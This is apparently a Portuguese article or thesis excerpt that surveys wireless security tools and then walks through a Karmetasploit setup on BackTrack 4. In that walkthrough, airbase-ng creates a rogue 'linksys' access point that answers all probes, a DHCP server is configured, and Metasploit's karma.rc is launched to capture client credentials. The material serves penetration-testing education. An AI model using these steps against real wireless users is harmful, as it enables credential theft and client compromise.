Kismet
O Kismet é uma ferramenta passiva que trata a busca de informações e captura de pacotes de uma determinada rede. Quando executada, sua interface de rede é automaticamente inserida em modo promíscuo.
Aircrack
-ng
É um detector de redes, sniffer de pacote além de ser uma ferramenta de análise para redes locais sem fios 802.11.
Airmon-ng
O airmon-ng faz parte da suíte de ferramentas do aircrack-ng, que serve para colocar a interface de rede wireless em modo monitor.
Airodump-ng
O airodump-ng tem como principal objetivo fazer a captura de pacotes que trafegam na rede wireless.
Aireplay-ng
O principal objetivo do aireplay-ng é gerar tráfego na rede e utilizar o aircrack-ng para quebra de criptografias.
Airdecap-ng
Utilizado para decifrar criptografias wep e wpa, através das capturas de arquivos.
Arpforge-ng
Ferramenta que serve para forjar os pacotes de pedido ARP.
John the Ripper
É gratuito e open source, distribuído principalmente na forma de código fonte e é distribuído principalmente na forma de pacotes para os sistemas operacionais de destino e em geral é feito para ser fácil de instalar e usar.
Netstumbler
Ferramenta utilizada para detectar todos os tipos de redes sem fio, onde permite ver também as configurações da rede para verificar a sua integridade.
Inssider
É um scanner de rede sem fio gratuito para o Windows 7, Vista e Windows XP, devido ao NetStumbler não funcionar bem com o Windows Vista e Windows XP 64-bit.
Fake AP
Parte de um honeypot ou como um instrumento de seu plano de segurança do site, Fake AP serve para confundir wardrivers, netstumblers, script kiddies e outros elementos indesejáveis.
Back Track4
É destinado para todos os públicos, desde os profissionais de segurança mais experientes até os recém-chegados, onde promove uma maneira rápida e fácil de encontrar e atualizar o maior banco de dados da coleção de ferramentas de segurança, até a data.
Metasploit Framework
Foi desenvolvido para fornecer informações úteis para os profissionais de segurança e os desenvolvedores de assinatura IDS.
Karmetasploit
É um conjunto de ferramentas para avaliar a segurança de clientes sem fio em várias camadas, podendo ter acesso a um "SHELL METERPRETER" e pode capturar credenciais ou explorar vulnerabilidades do lado do cliente no host.
Nmap
Possui código aberto e serve para exploração de redes ou fazer auditoria de segurança. Muitos sistemas e administradores de rede também acham que é útil para tarefas tais como: inventário de rede, gestão de atualizações de serviços de acolhimento e de acompanhamento ou serviço uptime.
Nessus
É scanner de vulnerabilidade e o líder mundial em scanners ativos, com descoberta de alta velocidade, auditoria de configuração de perfis ativos, descoberta de dados sensíveis e análise de vulnerabilidades de sua rede.
Gfi Languard
Usado para fazer varreduras de rede e portas, avaliar e corrigir vulnerabilidades de segurança com o mínimo de esforço administrativo.
Dsniff
O dsniff é uma coleção de ferramentas usada para fazer auditoria e penetração em redes.
Wireshark
É um programa que verifica os pacotes transmitidos pelo dispositivo de comunicação, onde tem como detectar problemas de rede, conexões suspeitas, auxiliar no desenvolvimento de aplicativos e qualquer outra atividade relacionada à rede.
Airbase-ng
É uma ferramenta que visa atacar os clientes, onde tem como objetivo principal convidar os utilizadores a associarem-se a um AP "pirata", no entanto esta operação não os impede os utilizadores da rede de se conectarem ao verdadeiro AP.
Neste caso será usada a distribuição Back Track v4 que contém a suíte de ferramentas Metasploit Framework, que conta com mais de 500 exploits para exploração de vulnerabilidades, onde a escolhida foi o "Karma", que é um conjunto de ferramentas para avaliar a segurança de clientes das redes sem fio em várias camadas, e pode-se capturar credenciais ou explorar vulnerabilidades do lado do cliente no host.
Pré-requisitos:
Você precisa ter a suíte aircrack-ng instalada, consulte:
http://www.aircrack-ng.org/doku.php?id=install_aircrack
Karmetasploit requer um banco de dados back-end para estar no lugar antes que ele possa ser usado, isso pode ser conseguido através da execução:
# gem install sqlite3-ruby activerecord
Figura 11. Instalação
Configuração inicial
A primeira coisa que precisamos é configurar um servidor dhcp em
/etc/dhcpd/dhcpd.conf.
Figura 12. Configuração DHCP
Após a configuração do servidor dhcp devemos iniciar o serviço através do comando a seguir:
# /etc/init.d/dhcp3-server start
Em seguida, atualize o banco de exploits do Metasploit, para isso entre no diretório /pentest/exploits/framework3.
# cd / pentest/exploits/framework3
# svn update
Agora crie uma nova interface de modo monitor virtual:
# airmon-ng start wlan0
Isso irá criar um modo de interface mon0 monitor, use iwconfig para confirmar.
Agora crie o novo ponto de acesso:
# airbase-ng -c 11 -P -C 30 --essid "linksys"-v mon0
Figura 13. Ap Rogue
- - c = canal
- - P = Responda a todas as sondas
- - C 30 = permitir balizamento de valores sondados ESSID (em segundos)
- -- essid = especificar um único ESSID
- - V = verbose
- mon0 = Nossa interface de modo monitor virtual
# ifconfig at0 10.0.0.1 netmask 255.255.255.0 up
# vim /etc/default/dhcp3-server
INTERFACES="at0"
# cd /pentest/exploits/framework3
# . /msfconsole -r karma.rc
Figura 14. Karma